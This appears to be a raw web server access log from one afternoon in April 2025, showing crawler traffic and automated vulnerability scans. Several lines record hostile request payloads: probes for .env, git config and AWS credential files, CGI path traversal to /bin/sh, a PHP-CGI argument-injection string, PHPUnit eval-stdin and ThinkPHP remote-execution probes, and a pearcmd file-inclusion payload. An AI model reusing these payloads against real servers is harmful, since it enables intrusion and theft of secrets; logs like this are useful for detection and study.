167.94.138.119 - - [27/Apr/2025:12:08:25 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.119 - - [27/Apr/2025:12:08:27 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.54 - - [27/Apr/2025:12:09:21 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.249.64.98 - - [27/Apr/2025:12:18:44 +0200] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
141.98.11.244 - - [27/Apr/2025:12:20:31 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [27/Apr/2025:12:36:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [27/Apr/2025:12:42:54 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.211.191.76 - - [27/Apr/2025:12:43:35 +0200] "GET /.git/index HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
185.16.38.107 - - [27/Apr/2025:12:50:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.128.58.63 - - [27/Apr/2025:13:02:25 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.43.190 - - [27/Apr/2025:13:02:34 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.52.6 - - [27/Apr/2025:13:02:50 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.29.154 - - [27/Apr/2025:13:02:59 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
74.82.47.4 - - [27/Apr/2025:13:05:30 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0"
74.82.47.4 - - [27/Apr/2025:13:09:03 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.156 Not(A:Brand/24 YaBrowser/24.4.1.899 Yowser/2.5 Safari/537.36"
74.82.47.4 - - [27/Apr/2025:13:09:58 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0"
74.82.47.4 - - [27/Apr/2025:13:10:34 +0200] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0"
74.82.47.4 - - [27/Apr/2025:13:10:40 +0200] "GET /phpinfo.php HTTP/1.1" 200 10191 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:62.0) Gecko/20100101 Firefox/62.0"
74.82.47.4 - - [27/Apr/2025:13:10:43 +0200] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.160 Safari/537.36"
154.81.156.7 - - [27/Apr/2025:13:10:52 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
185.255.122.19 - - [27/Apr/2025:13:21:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [27/Apr/2025:13:25:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
125.113.58.67 - - [27/Apr/2025:13:26:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
154.81.156.35 - - [27/Apr/2025:13:37:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
107.170.0.232 - - [27/Apr/2025:13:45:25 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
107.170.0.232 - - [27/Apr/2025:13:45:25 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
94.236.193.66 - - [27/Apr/2025:13:51:02 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
154.81.156.54 - - [27/Apr/2025:13:51:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.255.57.58 - - [27/Apr/2025:13:52:26 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.218.84.178 - - [27/Apr/2025:14:08:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
78.153.140.179 - - [27/Apr/2025:14:10:55 +0200] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.179 - - [27/Apr/2025:14:10:56 +0200] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1"
78.153.140.179 - - [27/Apr/2025:14:10:56 +0200] "GET /tmp.php HTTP/1.1" 404 352 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) GSA/7.0.55539 Mobile/11D257 Safari/9537.53"
78.153.140.179 - - [27/Apr/2025:14:10:56 +0200] "GET /test.js HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ca; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
78.153.140.179 - - [27/Apr/2025:14:10:56 +0200] "GET /test1.php HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MASN; rv:11.0) like Gecko"
78.153.140.179 - - [27/Apr/2025:14:10:56 +0200] "GET /test2.php HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0"
78.153.140.179 - - [27/Apr/2025:14:10:57 +0200] "GET /test5.php HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; Event Build/IML77) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.179 - - [27/Apr/2025:14:10:57 +0200] "GET /test_info1.php HTTP/1.1" 404 359 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Ubuntu/10.10 Chromium/9.0.600.0 Chrome/9.0.600.0 Safari/534.14"
78.153.140.179 - - [27/Apr/2025:14:10:57 +0200] "GET /test_phpinfo.php HTTP/1.1" 404 361 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009042113 Linux Mint/6 (Felicia) Firefox/3.0.9"
78.153.140.179 - - [27/Apr/2025:14:10:57 +0200] "GET /test_phpinfo1.php HTTP/1.1" 404 362 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8) Gecko/20060110 Debian/1.5.dfsg-4 Firefox/1.5"
78.153.140.179 - - [27/Apr/2025:14:10:57 +0200] "GET /test_phpinfo2.php HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Android 5.1.1; Mobile; rv:54.0) Gecko/54.0 Firefox/54.0"
78.153.140.179 - - [27/Apr/2025:14:10:57 +0200] "GET /test_phpinfo3.php HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
78.153.140.179 - - [27/Apr/2025:14:10:58 +0200] "GET /testing.php HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S7562 Build/IMM76I) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.179 - - [27/Apr/2025:14:10:59 +0200] "GET /testphpinfo HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.227.0 Safari/532.3"
78.153.140.179 - - [27/Apr/2025:14:11:00 +0200] "GET /testphpinfo.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
78.153.140.179 - - [27/Apr/2025:14:11:00 +0200] "GET /tmp/phpinfo.php HTTP/1.1" 404 360 "-" "Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) FxiOS/1.4 Mobile/13D15 Safari/601.1.46"
78.153.140.179 - - [27/Apr/2025:14:11:00 +0200] "GET /token.php HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
78.153.140.179 - - [27/Apr/2025:14:11:01 +0200] "GET /tools/info.php HTTP/1.1" 404 359 "-" "Mozilla/5.0 (X11; CrOS x86_64 7077.111.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36"
78.153.140.179 - - [27/Apr/2025:14:11:02 +0200] "GET /w.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
78.153.140.179 - - [27/Apr/2025:14:11:03 +0200] "GET /web.php HTTP/1.1" 404 352 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0"
78.153.140.179 - - [27/Apr/2025:14:11:05 +0200] "GET /webfig/ HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2774.3 Safari/537.36 OPR/40.0.2288.0 (Edition developer)"
78.153.140.179 - - [27/Apr/2025:14:11:06 +0200] "GET /x.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/10.0.1 Safari/7046A194A"
78.153.140.179 - - [27/Apr/2025:14:11:06 +0200] "GET /.AWS_/credentials HTTP/1.1" 404 362 "-" "More Firefox 3.5.9 user agents strings -->>"
78.153.140.179 - - [27/Apr/2025:14:11:06 +0200] "GET /.circleci/config.yml HTTP/1.1" 404 365 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.17 (KHTML, like Gecko) Version/8.0.6 Safari/600.6.3"
78.153.140.179 - - [27/Apr/2025:14:11:08 +0200] "GET /.local HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0"
78.153.140.179 - - [27/Apr/2025:14:11:08 +0200] "GET /.remote HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; ATT; rv:11.0) like Gecko"
78.153.140.179 - - [27/Apr/2025:14:11:10 +0200] "GET /admin/.git/config HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Mobile; $LYF/$F30C/$LYF_F30C-000-09-09-010218; Android; rv:48.0) Gecko/48.0 Firefox/48.0 KAIOS/2.0"
78.153.140.179 - - [27/Apr/2025:14:11:11 +0200] "GET /api/.git/config HTTP/1.1" 404 360 "-" "Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13"
78.153.140.179 - - [27/Apr/2025:14:11:11 +0200] "GET /api/env HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_9_5) AppleWebKit/600.7.12 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.12"
78.153.140.179 - - [27/Apr/2025:14:11:12 +0200] "GET /api/shared/config/config.env HTTP/1.1" 404 373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
78.153.140.179 - - [27/Apr/2025:14:11:12 +0200] "GET /app/.git/config HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
104.234.115.158 - - [27/Apr/2025:14:14:10 +0200] "GET / HTTP/1.0" 200 423 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
104.234.115.158 - - [27/Apr/2025:14:14:21 +0200] "\x16\x03\x01" 400 383 "-" "-"
104.234.115.158 - - [27/Apr/2025:14:14:58 +0200] "GET / HTTP/1.1" 200 274 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
104.234.115.158 - - [27/Apr/2025:14:18:51 +0200] "\x16\x03\x01" 400 383 "-" "-"
104.234.115.158 - - [27/Apr/2025:14:19:00 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
185.16.38.107 - - [27/Apr/2025:14:22:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [27/Apr/2025:14:37:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [27/Apr/2025:14:41:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.7 - - [27/Apr/2025:14:41:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.226 - - [27/Apr/2025:14:43:36 +0200] "GET /login.asp HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Safari/537.36"
185.218.86.4 - - [27/Apr/2025:14:44:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.244 - - [27/Apr/2025:14:59:13 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [27/Apr/2025:15:04:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.255.57.58 - - [27/Apr/2025:15:08:44 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
92.255.57.58 - - [27/Apr/2025:15:24:04 +0200] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
170.106.160.90 - - [27/Apr/2025:15:33:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.54 - - [27/Apr/2025:15:39:25 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.35 - - [27/Apr/2025:15:49:10 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.38.107 - - [27/Apr/2025:15:54:07 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
188.128.39.37 - - [27/Apr/2025:16:11:33 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:33 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:34 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 356 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:34 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 395 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:34 +0200] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 391 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:35 +0200] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 387 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:35 +0200] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 383 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:35 +0200] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 390 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:36 +0200] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:36 +0200] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 388 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:37 +0200] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 384 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:37 +0200] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 380 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:37 +0200] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 376 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:37 +0200] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 392 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:38 +0200] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 388 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:38 +0200] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 384 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:38 +0200] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 380 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:38 +0200] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:39 +0200] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 403 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:39 +0200] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:39 +0200] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 398 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:40 +0200] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:40 +0200] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:40 +0200] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:41 +0200] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 398 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:41 +0200] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:41 +0200] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:41 +0200] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 403 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:42 +0200] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:42 +0200] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:43 +0200] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:44 +0200] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:44 +0200] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:44 +0200] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:44 +0200] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:45 +0200] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 412 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:45 +0200] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 401 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:45 +0200] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 402 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:46 +0200] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 400 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:46 +0200] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 399 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:46 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 423 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:47 +0200] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 361 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:47 +0200] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 200 423 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:47 +0200] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 423 "-" "Custom-AsyncHttpClient"
188.128.39.37 - - [27/Apr/2025:16:11:48 +0200] "GET /containers/json HTTP/1.1" 404 360 "-" "Custom-AsyncHttpClient"
5.183.209.244 - - [27/Apr/2025:16:14:56 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
154.81.156.54 - - [27/Apr/2025:16:18:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.116 - - [27/Apr/2025:16:23:20 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.116 - - [27/Apr/2025:16:24:27 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Python/3.7 aiohttp/3.8.1"
154.81.156.7 - - [27/Apr/2025:16:37:18 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.141 - - [27/Apr/2025:16:40:44 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
